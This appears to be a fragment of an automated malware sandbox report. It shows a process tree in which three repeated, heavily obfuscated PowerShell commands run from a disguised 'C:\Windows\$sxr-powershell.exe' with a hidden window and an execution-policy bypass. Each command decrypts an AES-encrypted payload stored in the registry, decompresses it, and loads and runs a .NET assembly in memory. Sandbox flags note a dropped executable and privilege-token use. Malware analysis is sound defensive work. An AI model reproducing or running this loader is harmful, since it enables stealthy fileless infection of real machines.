                                                        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(2164).WaitForExit();[System.Threading.Thread]::Sleep(5000); function xFEyP($JUbKm){ $IXgJU=[System.Security.Cryptography.Aes]::Create(); $IXgJU.Mode=[System.Security.Cryptography.CipherMode]::CBC; $IXgJU.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $IXgJU.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SW3ru+/MjR9WpfHUJLJZ86KMc9JJtYKXrxj9adJvD0w='); $IXgJU.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bShGQyLVFYlLoL22UaNH/g=='); $IKtSy=$IXgJU.('rotpyrceDetaerC'[-1..-15] -join '')(); $MANst=$IKtSy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($JUbKm, 0, $JUbKm.Length); $IKtSy.Dispose(); $IXgJU.Dispose(); $MANst;}function hzLpy($JUbKm){ $nSCRw=New-Object System.IO.MemoryStream(,$JUbKm); $LwLqj=New-Object System.IO.MemoryStream; $JufCW=New-Object System.IO.Compression.GZipStream($nSCRw, [IO.Compression.CompressionMode]::Decompress); $JufCW.CopyTo($LwLqj); $JufCW.Dispose(); $nSCRw.Dispose(); $LwLqj.Dispose(); $LwLqj.ToArray();}function qbGWz($JUbKm,$TKtew){ $hOjGD=[System.Reflection.Assembly]::Load([byte[]]$JUbKm); $nykSy=$hOjGD.EntryPoint; $nykSy.Invoke($null, $TKtew);}$IXgJU1 = New-Object System.Security.Cryptography.AesManaged;$IXgJU1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IXgJU1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IXgJU1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SW3ru+/MjR9WpfHUJLJZ86KMc9JJtYKXrxj9adJvD0w=');$IXgJU1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bShGQyLVFYlLoL22UaNH/g==');$DYLOP = $IXgJU1.('rotpyrceDetaerC'[-1..-15] -join '')();$xYJPG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nikA7tS4MbL6+pcdhh40nw==');$xYJPG = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($xYJPG, 0, $xYJPG.Length);$xYJPG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($xYJPG);$PEZij = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('fR4QSYjqVq3kCKCNB0zoT/EzmQDFXjJreLyVCFpmQaM=');$PEZij = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($PEZij, 0, $PEZij.Length);$PEZij = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($PEZij);$SvBfZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vm5KOH2NwZml0sQ127on5Q==');$SvBfZ = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($SvBfZ, 0, $SvBfZ.Length);$SvBfZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($SvBfZ);$uWxtU = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('UGWpGZkglw05m3QUhBQnOYFO/fyws7Tq9HuPtIcmFSPSV6JoA8MXIuJZyKmMngQCAkhPBhUTwcMKqu/qd0jNeM9C2aYBF1zGVHAMtM401134VOcnBfqt5m6+PrtdUXqF1M27DGeoWl0q3DtRZTRI9Ud/nFSL9f3UgKKlrCj0AGRK3Q3ERG4uw0jynpujv26bvINXrixhA82tZh9lctMwlDA6eXHPREe8vWhOvdvzObkvtgrkUCXGwls7Xkes8pD0t5mBdxDMMfMjNUpNgw6vcqoQQtoad78QTTtFP7ChahkgxjPKTAhbHjlbVshzH9l0OrIqsATZnWaKUP5JS5fYghEr3jTuLcPctPxMvW1e1GCFvwNeVk/kT54fI1M552VYVuqcAEqiedpPBXkDH6Q25WIY2GicEQfbinZO6IUVFc8=');$uWxtU = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uWxtU, 0, $uWxtU.Length);$uWxtU = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uWxtU);$DDUmW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0uPWJD7N6EM3Gyy58ZZW2g==');$DDUmW = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DDUmW, 0, $DDUmW.Length);$DDUmW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DDUmW);$wgHTz = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WGOP1wSv7Yi99UHBGZCiyA==');$wgHTz = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($wgHTz, 0, $wgHTz.Length);$wgHTz = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($wgHTz);$pclRc = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VyRcTnXy5unLECwX50S0CQ==');$pclRc = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($pclRc, 0, $pclRc.Length);$pclRc = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($pclRc);$NRYME = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('+dEH6faSs3PNfoaqjmpgkA==');$NRYME = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NRYME, 0, $NRYME.Length);$NRYME = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NRYME);$eUTAt = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('DkdrrrMERB+nGH2+b/f64w==');$eUTAt = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($eUTAt, 0, $eUTAt.Length);$eUTAt = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($eUTAt);$xYJPG0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('xkJwjn7oMP9IPDdaDtjmcA==');$xYJPG0 = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($xYJPG0, 0, $xYJPG0.Length);$xYJPG0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($xYJPG0);$xYJPG1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PYP8GLKW6aUoKmf5pknXwg==');$xYJPG1 = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($xYJPG1, 0, $xYJPG1.Length);$xYJPG1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($xYJPG1);$xYJPG2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yDd4W4708IQJzHiRcino9Q==');$xYJPG2 = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($xYJPG2, 0, $xYJPG2.Length);$xYJPG2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($xYJPG2);$xYJPG3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ysYU2Lu0SKMOlUY+eSbMPA==');$xYJPG3 = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($xYJPG3, 0, $xYJPG3.Length);$xYJPG3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($xYJPG3);$DYLOP.Dispose();$IXgJU1.Dispose();$oppGA = [Microsoft.Win32.Registry]::$NRYME.$pclRc($xYJPG).$wgHTz($PEZij);$UcyFL=[string[]]$oppGA.Split('\');$VKQMD=hzLpy(xFEyP([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($UcyFL[1])));qbGWz $VKQMD (,[string[]] ('%*'));$ZbZue = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($UcyFL[0]);$IXgJU = New-Object System.Security.Cryptography.AesManaged;$IXgJU.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IXgJU.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IXgJU.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SW3ru+/MjR9WpfHUJLJZ86KMc9JJtYKXrxj9adJvD0w=');$IXgJU.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bShGQyLVFYlLoL22UaNH/g==');$IKtSy = $IXgJU.('rotpyrceDetaerC'[-1..-15] -join '')();$ZbZue = $IKtSy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ZbZue, 0, $ZbZue.Length);$IKtSy.Dispose();$IXgJU.Dispose();$nSCRw = New-Object System.IO.MemoryStream(, $ZbZue);$LwLqj = New-Object System.IO.MemoryStream;$JufCW = New-Object System.IO.Compression.GZipStream($nSCRw, [IO.Compression.CompressionMode]::$xYJPG1);$JufCW.$eUTAt($LwLqj);$JufCW.Dispose();$nSCRw.Dispose();$LwLqj.Dispose();$ZbZue = $LwLqj.ToArray();$dSRKT = $uWxtU | IEX;$hOjGD = $dSRKT::$xYJPG2($ZbZue);$nykSy = $hOjGD.EntryPoint;$nykSy.$xYJPG0($null, (, [string[]] ($SvBfZ)))
                                                        5⤵
                                                        • Executes dropped EXE
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:3964
                                                      • C:\Windows\$sxr-powershell.exe
                                                        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(2164).WaitForExit();[System.Threading.Thread]::Sleep(5000); function xFEyP($JUbKm){ $IXgJU=[System.Security.Cryptography.Aes]::Create(); $IXgJU.Mode=[System.Security.Cryptography.CipherMode]::CBC; $IXgJU.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $IXgJU.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SW3ru+/MjR9WpfHUJLJZ86KMc9JJtYKXrxj9adJvD0w='); $IXgJU.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bShGQyLVFYlLoL22UaNH/g=='); $IKtSy=$IXgJU.('rotpyrceDetaerC'[-1..-15] -join '')(); $MANst=$IKtSy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($JUbKm, 0, $JUbKm.Length); $IKtSy.Dispose(); $IXgJU.Dispose(); $MANst;}function hzLpy($JUbKm){ $nSCRw=New-Object System.IO.MemoryStream(,$JUbKm); $LwLqj=New-Object System.IO.MemoryStream; $JufCW=New-Object System.IO.Compression.GZipStream($nSCRw, [IO.Compression.CompressionMode]::Decompress); $JufCW.CopyTo($LwLqj); $JufCW.Dispose(); $nSCRw.Dispose(); $LwLqj.Dispose(); $LwLqj.ToArray();}function qbGWz($JUbKm,$TKtew){ $hOjGD=[System.Reflection.Assembly]::Load([byte[]]$JUbKm); $nykSy=$hOjGD.EntryPoint; $nykSy.Invoke($null, $TKtew);}$IXgJU1 = New-Object System.Security.Cryptography.AesManaged;$IXgJU1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IXgJU1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IXgJU1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SW3ru+/MjR9WpfHUJLJZ86KMc9JJtYKXrxj9adJvD0w=');$IXgJU1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bShGQyLVFYlLoL22UaNH/g==');$DYLOP = $IXgJU1.('rotpyrceDetaerC'[-1..-15] -join '')();$xYJPG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nikA7tS4MbL6+pcdhh40nw==');$xYJPG = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($xYJPG, 0, $xYJPG.Length);$xYJPG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($xYJPG);$PEZij = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('fR4QSYjqVq3kCKCNB0zoT/EzmQDFXjJreLyVCFpmQaM=');$PEZij = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($PEZij, 0, $PEZij.Length);$PEZij = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($PEZij);$SvBfZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vm5KOH2NwZml0sQ127on5Q==');$SvBfZ = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($SvBfZ, 0, $SvBfZ.Length);$SvBfZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($SvBfZ);$uWxtU = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('UGWpGZkglw05m3QUhBQnOYFO/fyws7Tq9HuPtIcmFSPSV6JoA8MXIuJZyKmMngQCAkhPBhUTwcMKqu/qd0jNeM9C2aYBF1zGVHAMtM401134VOcnBfqt5m6+PrtdUXqF1M27DGeoWl0q3DtRZTRI9Ud/nFSL9f3UgKKlrCj0AGRK3Q3ERG4uw0jynpujv26bvINXrixhA82tZh9lctMwlDA6eXHPREe8vWhOvdvzObkvtgrkUCXGwls7Xkes8pD0t5mBdxDMMfMjNUpNgw6vcqoQQtoad78QTTtFP7ChahkgxjPKTAhbHjlbVshzH9l0OrIqsATZnWaKUP5JS5fYghEr3jTuLcPctPxMvW1e1GCFvwNeVk/kT54fI1M552VYVuqcAEqiedpPBXkDH6Q25WIY2GicEQfbinZO6IUVFc8=');$uWxtU = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uWxtU, 0, $uWxtU.Length);$uWxtU = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uWxtU);$DDUmW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0uPWJD7N6EM3Gyy58ZZW2g==');$DDUmW = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DDUmW, 0, $DDUmW.Length);$DDUmW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DDUmW);$wgHTz = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WGOP1wSv7Yi99UHBGZCiyA==');$wgHTz = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($wgHTz, 0, $wgHTz.Length);$wgHTz = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($wgHTz);$pclRc = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VyRcTnXy5unLECwX50S0CQ==');$pclRc = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($pclRc, 0, $pclRc.Length);$pclRc = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($pclRc);$NRYME = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('+dEH6faSs3PNfoaqjmpgkA==');$NRYME = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NRYME, 0, $NRYME.Length);$NRYME = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NRYME);$eUTAt = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('DkdrrrMERB+nGH2+b/f64w==');$eUTAt = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($eUTAt, 0, $eUTAt.Length);$eUTAt = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($eUTAt);$xYJPG0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('xkJwjn7oMP9IPDdaDtjmcA==');$xYJPG0 = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($xYJPG0, 0, $xYJPG0.Length);$xYJPG0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($xYJPG0);$xYJPG1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PYP8GLKW6aUoKmf5pknXwg==');$xYJPG1 = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($xYJPG1, 0, $xYJPG1.Length);$xYJPG1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($xYJPG1);$xYJPG2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yDd4W4708IQJzHiRcino9Q==');$xYJPG2 = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($xYJPG2, 0, $xYJPG2.Length);$xYJPG2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($xYJPG2);$xYJPG3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ysYU2Lu0SKMOlUY+eSbMPA==');$xYJPG3 = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($xYJPG3, 0, $xYJPG3.Length);$xYJPG3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($xYJPG3);$DYLOP.Dispose();$IXgJU1.Dispose();$oppGA = [Microsoft.Win32.Registry]::$NRYME.$pclRc($xYJPG).$wgHTz($PEZij);$UcyFL=[string[]]$oppGA.Split('\');$VKQMD=hzLpy(xFEyP([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($UcyFL[1])));qbGWz $VKQMD (,[string[]] ('%*'));$ZbZue = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($UcyFL[0]);$IXgJU = New-Object System.Security.Cryptography.AesManaged;$IXgJU.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IXgJU.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IXgJU.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SW3ru+/MjR9WpfHUJLJZ86KMc9JJtYKXrxj9adJvD0w=');$IXgJU.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bShGQyLVFYlLoL22UaNH/g==');$IKtSy = $IXgJU.('rotpyrceDetaerC'[-1..-15] -join '')();$ZbZue = $IKtSy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ZbZue, 0, $ZbZue.Length);$IKtSy.Dispose();$IXgJU.Dispose();$nSCRw = New-Object System.IO.MemoryStream(, $ZbZue);$LwLqj = New-Object System.IO.MemoryStream;$JufCW = New-Object System.IO.Compression.GZipStream($nSCRw, [IO.Compression.CompressionMode]::$xYJPG1);$JufCW.$eUTAt($LwLqj);$JufCW.Dispose();$nSCRw.Dispose();$LwLqj.Dispose();$ZbZue = $LwLqj.ToArray();$dSRKT = $uWxtU | IEX;$hOjGD = $dSRKT::$xYJPG2($ZbZue);$nykSy = $hOjGD.EntryPoint;$nykSy.$xYJPG0($null, (, [string[]] ($SvBfZ)))
                                                        5⤵
                                                        • Executes dropped EXE
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:3260
                                                      • C:\Windows\$sxr-powershell.exe
                                                        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(2164).WaitForExit();[System.Threading.Thread]::Sleep(5000); function xFEyP($JUbKm){ $IXgJU=[System.Security.Cryptography.Aes]::Create(); $IXgJU.Mode=[System.Security.Cryptography.CipherMode]::CBC; $IXgJU.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $IXgJU.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SW3ru+/MjR9WpfHUJLJZ86KMc9JJtYKXrxj9adJvD0w='); $IXgJU.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bShGQyLVFYlLoL22UaNH/g=='); $IKtSy=$IXgJU.('rotpyrceDetaerC'[-1..-15] -join '')(); $MANst=$IKtSy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($JUbKm, 0, $JUbKm.Length); $IKtSy.Dispose(); $IXgJU.Dispose(); $MANst;}function hzLpy($JUbKm){ $nSCRw=New-Object System.IO.MemoryStream(,$JUbKm); $LwLqj=New-Object System.IO.MemoryStream; $JufCW=New-Object System.IO.Compression.GZipStream($nSCRw, [IO.Compression.CompressionMode]::Decompress); $JufCW.CopyTo($LwLqj); $JufCW.Dispose(); $nSCRw.Dispose(); $LwLqj.Dispose(); $LwLqj.ToArray();}function qbGWz($JUbKm,$TKtew){ $hOjGD=[System.Reflection.Assembly]::Load([byte[]]$JUbKm); $nykSy=$hOjGD.EntryPoint; $nykSy.Invoke($null, $TKtew);}$IXgJU1 = New-Object System.Security.Cryptography.AesManaged;$IXgJU1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IXgJU1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IXgJU1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SW3ru+/MjR9WpfHUJLJZ86KMc9JJtYKXrxj9adJvD0w=');$IXgJU1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bShGQyLVFYlLoL22UaNH/g==');$DYLOP = $IXgJU1.('rotpyrceDetaerC'[-1..-15] -join '')();$xYJPG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nikA7tS4MbL6+pcdhh40nw==');$xYJPG = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($xYJPG, 0, $xYJPG.Length);$xYJPG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($xYJPG);$PEZij = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('fR4QSYjqVq3kCKCNB0zoT/EzmQDFXjJreLyVCFpmQaM=');$PEZij = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($PEZij, 0, $PEZij.Length);$PEZij = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($PEZij);$SvBfZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vm5KOH2NwZml0sQ127on5Q==');$SvBfZ = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($SvBfZ, 0, $SvBfZ.Length);$SvBfZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($SvBfZ);$uWxtU = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('UGWpGZkglw05m3QUhBQnOYFO/fyws7Tq9HuPtIcmFSPSV6JoA8MXIuJZyKmMngQCAkhPBhUTwcMKqu/qd0jNeM9C2aYBF1zGVHAMtM401134VOcnBfqt5m6+PrtdUXqF1M27DGeoWl0q3DtRZTRI9Ud/nFSL9f3UgKKlrCj0AGRK3Q3ERG4uw0jynpujv26bvINXrixhA82tZh9lctMwlDA6eXHPREe8vWhOvdvzObkvtgrkUCXGwls7Xkes8pD0t5mBdxDMMfMjNUpNgw6vcqoQQtoad78QTTtFP7ChahkgxjPKTAhbHjlbVshzH9l0OrIqsATZnWaKUP5JS5fYghEr3jTuLcPctPxMvW1e1GCFvwNeVk/kT54fI1M552VYVuqcAEqiedpPBXkDH6Q25WIY2GicEQfbinZO6IUVFc8=');$uWxtU = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uWxtU, 0, $uWxtU.Length);$uWxtU = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uWxtU);$DDUmW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0uPWJD7N6EM3Gyy58ZZW2g==');$DDUmW = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DDUmW, 0, $DDUmW.Length);$DDUmW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DDUmW);$wgHTz = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WGOP1wSv7Yi99UHBGZCiyA==');$wgHTz = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($wgHTz, 0, $wgHTz.Length);$wgHTz = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($wgHTz);$pclRc = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VyRcTnXy5unLECwX50S0CQ==');$pclRc = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($pclRc, 0, $pclRc.Length);$pclRc = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($pclRc);$NRYME = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('+dEH6faSs3PNfoaqjmpgkA==');$NRYME = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NRYME, 0, $NRYME.Length);$NRYME = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NRYME);$eUTAt = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('DkdrrrMERB+nGH2+b/f64w==');$eUTAt = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($eUTAt, 0, $eUTAt.Length);$eUTAt = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($eUTAt);$xYJPG0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('xkJwjn7oMP9IPDdaDtjmcA==');$xYJPG0 = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($xYJPG0, 0, $xYJPG0.Length);$xYJPG0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($xYJPG0);$xYJPG1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PYP8GLKW6aUoKmf5pknXwg==');$xYJPG1 = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($xYJPG1, 0, $xYJPG1.Length);$xYJPG1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($xYJPG1);$xYJPG2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yDd4W4708IQJzHiRcino9Q==');$xYJPG2 = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($xYJPG2, 0, $xYJPG2.Length);$xYJPG2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($xYJPG2);$xYJPG3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ysYU2Lu0SKMOlUY+eSbMPA==');$xYJPG3 = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($xYJPG3, 0, $xYJPG3.Length);$xYJPG3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($xYJPG3);$DYLOP.Dispose();$IXgJU1.Dispose();$oppGA = [Microsoft.Win32.Registry]::$NRYME.$pclRc($xYJPG).$wgHTz($PEZij);$UcyFL=[string[]]$oppGA.Split('\');$VKQMD=hzLpy(xFEyP([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($UcyFL[1])));qbGWz $VKQMD (,[string[]] ('%*'));$ZbZue = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($UcyFL[0]);$IXgJU = New-Object System.Security.Cryptography.AesManaged;$IXgJU.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IXgJU.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IXgJU.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SW3ru+/MjR9WpfHUJLJZ86KMc9JJtYKXrxj9adJvD0w=');$IXgJU.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bShGQyLVFYlLoL22UaNH/g==');$IKtSy = $IXgJU.('rotpyrceDetaerC'[-1..-15] -join '')();$ZbZue = $IKtSy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ZbZue, 0, $ZbZue.Length);$IKtSy.Dispose();$IXgJU.Dispose();$nSCRw = New-Object System.IO.MemoryStream(, $ZbZue);$LwLqj = New-Object System.IO.MemoryStream;$JufCW = New-Object System.IO.Compression.GZipStream($nSCRw, [IO.Compression.CompressionMode]::$xYJPG1);$JufCW.$eUTAt($LwLqj);$JufCW.Dispose();$nSCRw.Dispose();$LwLqj.Dispose();$ZbZue = $LwLqj.ToArray();$dSRKT = $uWxtU | IEX;$hOjGD = $dSRKT::$xYJPG2($ZbZue);$nykSy = $hOjGD.EntryPoint;$nykSy.$xYJPG0($null, (, [string[]] ($SvBfZ)))
                                                        5⤵
                                                        • Executes dropped EXE
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:4048
                                                    • C:\Windows\System32\cmd.exe
